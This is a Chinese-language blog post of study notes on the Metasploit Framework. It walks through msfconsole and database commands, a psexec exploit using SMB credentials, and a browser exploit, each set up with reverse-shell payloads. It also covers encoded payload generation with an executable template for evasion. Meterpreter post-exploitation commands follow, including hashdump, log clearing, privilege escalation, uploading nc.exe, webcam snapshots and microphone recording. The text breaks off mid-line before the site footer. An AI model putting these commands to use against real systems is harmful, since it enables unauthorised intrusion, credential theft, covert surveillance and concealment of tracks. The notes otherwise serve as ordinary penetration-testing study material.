kaliMSF笔记

metasploit framework

基本使用

msfconsole使用接口
最流行的用户接口
几乎可以使用全部MSF功能
控制台命令支持TAB自动补齐
支持外部命令的执行(系统命令等)
点击鼠标启动 或 msfconsole -h帮助 -q不看banner -r -v版本信息
help / ? / help vulns

MSF控制台命令

Banner、Color
connect 类似nc

show auxiliary / exploits 等,显示所有

search usermap_script / help search
search name:mysql / path:scada / platform:aix / type:aux /author:aaron / cve:2011
可多条件同时搜索,-h查看

use dos/windows/smb/ms09_001_write
show options / payloads / targets / advanced / evasion
info查看信息、edit编辑脚本
Check、back

db_status数据库连接状态
db_rebuild_cache重新生成搜索缓存

db_nmap
hosts / host 1.1.1.1 / hosts -u / hosts -c address,os_flavor -S Linux 查看扫描到的主机
services -p 80 / services -c info,name -p 1-1000 查看开放的端口及服务
vulns 查看扫描出的漏洞 / creds (mysql_login) 查看破解出的密码 / loot (hashdump) 查看获取到的哈希值

db_disconnect / db_connect 断开、连接数据库
/usr/share/metasploit-framework/config/database.yml 默认数据库存放位置

db_import / db_export 数据库导出导入
db_import /root/nmap.xml
db_export -f xml /root/bak.xml

set / unset / setg设为默认直到退出 / unsetg / save 设为默认且一直存在
run / exploit 都一样
jobs / kill 0
load 加载openvas sqlmap等/ unload /loadpath加载自己写的模块的路径
session -l / -i (Shell、Meterpreter session、VNC)看获得的session
route通过指定session路由流量
irb(Framework::Version)编程
resource (msfconsol -r a.rc)自己写好个.rc,会自动执行一系列命令

exploit模块

Active exploit 主动
use exploit/windows/smb/psexec
set RHOST 192.168.1.100
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
set SMBUSER user1
set SMBPASS pass1
exploit

Passive Exploits 被动
use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
set URIPATH /
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
exploit

生成payload

use payload/windows/shell_bind_tcp

generate -b ‘\x00’ 生成payload并自动选择编码模块绕过坏字符,要绕过的坏字符太多会导致没有可用的模块

手动指定编码模块
show encoders
generate -e x86/nonalpha

generate -b ‘\x00’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
i设置重复编码几次 b绕过坏字符 e指定编码模块 k多线程 x使用模板 t输出格式

NOP:no-operation或叫Next Operation,无任何操作的字节,EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行,generate -s 14

meterpreter

高级、动态、可扩展的payload
后渗透测试阶段一站式操作界面

完全基于内存的DLL注入式payload(不写硬盘)
注入合法系统进程并建立stager
基于stager上传和预加载DLL进行扩展模块的注入
基于stager建立的socket连接建立加密的TLS/1.0通信隧道
利用TLS隧道进一步加载后续扩展模块(避免网络取证)

服务端使用C语言编写
客户端提供基于ruby的全特性API

meterpreter基本命令

Help 帮助background返回
Run执行一系列功能 bgrun在后台执行

Cd ls cat pwd dir mkdir mv rm rmdir edit就是vi
Windows和Linux的命令通用

lpwd lcd 等于在本机执行pwd、cd
clearev清除日志信息 download从控制的机器上下载文件
upload /usr/share/windows-binaries/nc.exe c:\windows\system32上传文件
execute -f cmd.exe -i –H 执行命令
getuid查看当前账号 getsystem获取system权限 getprivs查看当前权限 getproxy查看系统代理信息 getpid获取所注入进程的PID

Hashdump run post/windows/gather/hashdump
sysinfo ps kill migrate迁移进程 reboot shutdown shell
show_mount 显示挂载的硬盘 search -f autoexec.bat搜索文件
arp查看ARP缓存 netstat查看网络连接情况 ipconfig ifconfig route
Idletime查看空闲时间 resource类似msf的resource
record_mic记录麦克风声音 webcam_list摄像头列表 webcam_snap -i 1 -v false每一秒截摄像头一次

meterpreter Python扩展
无需运行环境,在客户端运行Python原生代码
load python
help
python_execute “print (‘asdasdas’)”
python_execute “import os; cd

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值